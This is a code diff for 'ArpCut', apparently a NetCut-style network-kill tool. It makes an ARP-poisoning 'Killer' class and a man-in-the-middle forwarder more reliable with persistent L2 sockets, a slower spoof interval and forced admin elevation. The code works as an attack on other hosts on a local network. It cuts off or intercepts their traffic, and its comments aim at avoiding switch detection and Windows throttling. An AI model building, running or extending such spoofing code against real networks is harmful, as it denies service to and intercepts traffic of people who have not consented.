NetCut-style stability fixes: persistent L2 sockets, 2s delay, UAC admin

Author: Magnus

.github/workflows/build-release.yml

@@ -28,6 +28,7 @@ jobs:
           pyinstaller --onefile --windowed --name ArpCut `
             --add-data "exe/manuf;manuf" `
             --icon exe/icon.ico `
+            --uac-admin `
             --hidden-import PyQt5 `
             --hidden-import PyQt5.QtWidgets `
             --hidden-import PyQt5.QtCore `

build.py

@@ -42,6 +42,7 @@ def build():
         cmd.extend(['--onefile', '--windowed'])
         cmd.extend(['--add-data', 'exe/manuf;manuf'])
         cmd.extend(['--icon', 'exe/icon.ico'])
+        cmd.extend(['--uac-admin'])  # Force admin elevation prompt
     elif system == 'Darwin':  # macOS
         cmd.extend(['--onedir', '--windowed'])
         cmd.extend(['--add-data', 'exe/manuf:manuf'])

src/networking/forwarder.py

@@ -1,10 +1,11 @@
-from scapy.all import IP, Ether, sendp, AsyncSniffer
+from scapy.all import IP, Ether, AsyncSniffer, L2Socket
 
 
 class MitmForwarder:
     """
     Simple user-space forwarder that optionally drops traffic in one direction.
     It assumes ARP poisoning is already in place so frames arrive at our NIC.
+    Uses persistent L2 socket to avoid Windows socket exhaustion.
     """
 
     def __init__(self, debug=False):
@@ -20,6 +21,7 @@ def __init__(self, debug=False):
         self._drop_count = 0
         self._fwd_count = 0
         self._debug = debug
+        self._socket = None  # Persistent L2 socket
 
     def start(
         self,
@@ -52,6 +54,16 @@ def start(
             self.running = False
             return
 
+        # Create persistent L2 socket
+        try:
+            self._socket = L2Socket(iface=self.iface)
+            if self._debug:
+                print(f"[forwarder] L2 socket created for {self.iface}")
+        except Exception as e:
+            if self._debug:
+                print(f"[forwarder] Failed to create L2 socket: {e}")
+            self._socket = None
+
         bpf = f"ip and host {self.victim['ip']}"
         if self._debug:
             print(f"[forwarder] Starting on {self.iface}")
@@ -81,6 +93,13 @@ def stop(self):
             except Exception:
                 pass
             self.sniffer = None
+        # Close persistent socket
+        if self._socket:
+            try:
+                self._socket.close()
+            except Exception:
+                pass
+            self._socket = None
         self.running = False
 
     def get_stats(self):
@@ -138,8 +157,14 @@ def _process_packet(self, pkt):
             print(f"[forwarder] stats: {self._pkt_count} seen, {self._drop_count} dropped, {self._fwd_count} fwd")
 
     def _send(self, pkt):
+        """Send using persistent socket, prevents Windows socket exhaustion"""
         try:
-            sendp(pkt, iface=self.iface, verbose=0)
+            if self._socket:
+                self._socket.send(pkt)
+            else:
+                # Fallback (shouldn't happen normally)
+                from scapy.all import sendp
+                sendp(pkt, iface=self.iface, verbose=0)
         except Exception:
             pass
 
@@ -157,5 +182,3 @@ def _fix_checksums(pkt):
                 del pkt['UDP'].chksum
         except Exception:
             pass
-
-

src/networking/killer.py

@@ -1,11 +1,13 @@
-from scapy.all import ARP, Ether, sendp, conf
+from scapy.all import ARP, Ether, conf, L2Socket
 from time import sleep
+import sys
 
 from networking.forwarder import MitmForwarder
 from tools.pfctl import ensure_pf_enabled, install_anchor, block_all_for, unblock_all_for
 from tools.utils import threaded, get_default_iface
 from constants import *
 
+
 class Killer:
     def __init__(self, router=DUMMY_ROUTER):
         self.iface = get_default_iface()
@@ -16,18 +18,61 @@ def __init__(self, router=DUMMY_ROUTER):
         self.storage = {}
         self.forwarders = {}
         self.pf_blocks = set()
+        self._socket = None  # Persistent L2 socket
+    
+    def _get_socket(self):
+        """Get or create persistent L2 socket - prevents Windows socket exhaustion"""
+        if self._socket is None:
+            try:
+                iface = self.iface.guid if hasattr(self.iface, 'guid') and self.iface.guid else self.iface.name
+                self._socket = L2Socket(iface=iface)
+            except Exception:
+                self._socket = None
+        return self._socket
+    
+    def _send_packet(self, packet):
+        """Send packet using persistent socket, fallback to new socket if needed"""
+        sock = self._get_socket()
+        if sock:
+            try:
+                sock.send(packet)
+                return
+            except Exception:
+                # Socket died, recreate
+                self._close_socket()
+        
+        # Fallback: direct send (creates new socket)
+        try:
+            from scapy.all import sendp
+            iface = self.iface.guid if hasattr(self.iface, 'guid') and self.iface.guid else self.iface.name
+            sendp(packet, iface=iface, verbose=0)
+        except Exception:
+            pass
+    
+    def _close_socket(self):
+        """Close persistent socket"""
+        if self._socket:
+            try:
+                self._socket.close()
+            except Exception:
+                pass
+            self._socket = None
 
     @threaded
-    def kill(self, victim, wait_after=1):
+    def kill(self, victim, wait_after=2):
         """
-        Spoofing victim
+        Spoofing victim.
+        Default 2 second delay - ARP cache lasts 30-120s, no need to spam.
+        Prevents Windows NDIS throttling.
         """
         if victim['mac'] in self.killed:
             return
 
         self.killed[victim['mac']] = victim
 
         # Send ARP reply (is-at) with proper Ethernet destination to poison caches
+        # Unicast to specific MAC, not broadcast - avoids switch storm detection
+        
         # Victim: tell victim that router IP is at our MAC
         to_victim = Ether(dst=victim['mac'])/ARP(
             op=2,
@@ -46,13 +91,11 @@ def kill(self, victim, wait_after=1):
             hwdst=self.router['mac']
         )
 
-        iface_to_use = self.iface.guid if hasattr(self.iface, 'guid') and self.iface.guid else self.iface.name
-
         while victim['mac'] in self.killed \
             and self.iface.name != 'NULL':
-            # Send packets to both victim and router (L2 frames)
-            sendp(to_victim, iface=iface_to_use, verbose=0)
-            sendp(to_router, iface=iface_to_use, verbose=0)
+            # Send packets using persistent socket
+            self._send_packet(to_victim)
+            self._send_packet(to_router)
             sleep(wait_after)
 
         self._stop_forwarder(victim['mac'])
@@ -82,12 +125,12 @@ def unkill(self, victim):
             hwdst=self.router['mac']
         )
 
-        iface_to_use = self.iface.guid if hasattr(self.iface, 'guid') and self.iface.guid else self.iface.name
         if self.iface.name != 'NULL':
-            # Send packets to both victim and router
+            # Send restore packets 3 times
             for _ in range(3):
-                sendp(to_victim, iface=iface_to_use, verbose=0)
-                sendp(to_router, iface=iface_to_use, verbose=0)
+                self._send_packet(to_victim)
+                self._send_packet(to_router)
+                sleep(0.1)
         self._stop_forwarder(victim['mac'])
         self._remove_pf_block(victim['ip'])
 
@@ -110,6 +153,8 @@ def unkill_all(self):
             self._stop_forwarder(mac)
         for ip in list(self.pf_blocks):
             self._remove_pf_block(ip)
+        # Close persistent socket when done
+        self._close_socket()
 
     def store(self):
         """